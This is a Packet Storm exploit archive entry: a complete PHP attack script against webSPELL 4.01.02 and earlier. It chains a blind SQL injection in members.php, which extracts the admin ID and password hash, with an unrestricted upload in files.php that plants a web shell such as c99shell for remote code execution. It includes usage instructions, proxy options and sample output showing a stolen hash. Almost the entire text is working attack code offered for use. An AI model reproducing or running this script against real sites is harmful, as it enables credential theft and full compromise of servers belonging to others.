webspell-exec.txt

2007-03-08T00:00:00
ID PACKETSTORM:54916
Type packetstorm
Reporter DarkFig
Modified 2007-03-08T00:00:00

Description

                                        
                                            `#!/usr/bin/php  
<?php  
/**  
* This file require the PhpSploit class.  
* If you want to use this class, the latest  
* version can be downloaded from acid-root.new.fr.  
**/  
require("phpsploitclass.php");  
error_reporting(E_ALL ^ E_NOTICE);  
  
# Admin id: 1  
# Admin hash: 7b24afc8bc80e548d66c4e7ff72171c5  
# Logged in (ws_auth=1%3A7b24afc8bc80e548d66c4e7ff72171c5)  
# Trying to upload the malicious file  
# Done (http://localhost/webspell4.01.02/downloads/c99shell.php)  
#  
if($argc < 5)  
{  
print ("  
------ webSPELL <= 4.01.02 Remote PHP Code Execution Exploit ------  
-----------------------------------------------------------------------  
PHP conditions: register_globals=On  
Credits: DarkFig <gmdarkfig@gmail.com>  
URL: http://www.acid-root.new.fr/  
-----------------------------------------------------------------------  
Usage: $argv[0] -url <> -file <> [Options]  
Params: -url For example http://victim.com/webspell/   
-file The file you wanna upload (c99shell.php...)  
Options: -prefix Table prefix (default=webs)  
-upmatch The match which returns TRUE for the upload  
-sqlmatch The match which returns TRUE for the SQL injection  
-proxy If you wanna use a proxy <proxyhost:proxyport>   
-proxyauth Basic authentification <proxyuser:proxypwd>  
Example: $argv[0] -url http://localhost/webspell/ -file c99shell.php  
-----------------------------------------------------------------------  
");exit(1);  
}  
  
$url = getparam('url',1);  
$file = getparam('file',1);  
$prfix = (getparam('prefix')!='') ? getparam('prefix') : 'webs';  
$match_upload = (getparam('upmatch')!='') ? getparam('upmatch') : '\;URL\=index\.php\?site\=files\&file\=';  
$match_blindsql = (getparam('sqlmatch')!='') ? getparam('sqlmatch') : 'site\=profile\&id\=';  
$proxy = getparam('proxy');  
$authp = getparam('proxyauth');  
  
$xpl = new phpsploit();  
$xpl->agent("Mozilla Firefox");  
if($proxy) $xpl->proxy($proxy);  
if($authp) $xpl->proxyauth($authp);  
  
print "\nAdmin id: ";  
$userid = blind('userID');  
  
print "\nAdmin hash: ";  
$passwd = strtolower(blind('password'));  
  
print "\nLogged in (ws_auth=$userid%3A$passwd)";  
$xpl->addcookie("ws_auth",$userid."%3A".$passwd);  
  
  
# File upload vulnerability  
#  
# +files.php  
# |  
# 42. $action = $_GET['action'];  
# 43. if($action=="save") {  
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));  
# 46. $upfile = $_FILES[upfile];  
# 69. $filepath = "./downloads/";  
# 71. $des_file = $filepath.$upfile[name];  
# 72. if(!file_exists($des_file)) {  
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {  
#  
print "\nTrying to upload the malicious file";  
$frmdt = array(frmdt_url => $url.'index.php?site=files&action=save',  
"fileurl" => 1,  
"upfile" => array(frmdt_filename => basename($file),  
frmdt_content => file_get_contents($file)));  
  
$xpl->formdata($frmdt);  
if(preg_match("#$match_upload#si",$xpl->getcontent())) print "\nDone";  
else print "\nFailed";  
print " (${url}downloads/".basename($file).")\n";  
  
  
# Simple blind SQL injection (register_globals=On)  
#  
# +members.php  
# |  
# 31. if($_GET['action']=="show") {  
# 32. if($_GET['squadID']) {  
# 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"';  
# 34. }  
# 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER BY sort");  
#  
function blind($field)  
{  
global $prfix,$xpl,$url,$match_blindsql;  
$d=0; $v='';  
  
if(!eregi('p',$field)) { $b=47;$c=57; } # 0-9  
else { $b=47;$c=70; } # 0-9a-z  
  
while(TRUE)  
{  
$d++;  
for($e=$b;$e<=$c;$e++)  
{  
if($e==47) $f='NULL';  
else $f=$e;  
  
$sql = "WHERE SUBSTR((SELECT $field FROM ${prfix}_user WHERE userID="  
."(SELECT userID FROM ${prfix}_user_groups WHERE files=1 LIMIT 1)"  
." LIMIT 1),$d,1)=CHAR($f)";  
  
$xpl->get($url."index.php?site=members&action=show&getsquad=".urlencode($sql));  
if(preg_match("#$match_blindsql#",$xpl->getcontent(),$matches))  
{  
if($e==47)  
{  
return $v;  
}  
else  
{  
print strtolower(chr($f));  
$v .= chr($f);  
break;  
}  
}  
}  
}  
}  
  
function getparam($param,$opt='')  
{  
global $argv;  
foreach($argv as $value => $key)  
{  
if($key == '-'.$param) return $argv[$value+1];  
}  
if($opt) exit("\n-$param parameter required");  
else return;  
}  
  
if(!function_exists('file_get_contents')) {  
function file_get_contents($file)  
{  
$handle = fopen($file, "r");  
$content = fread($fd, filesize($file));  
fclose($handle);  
return $content;  
}  
}  
  
?>  
`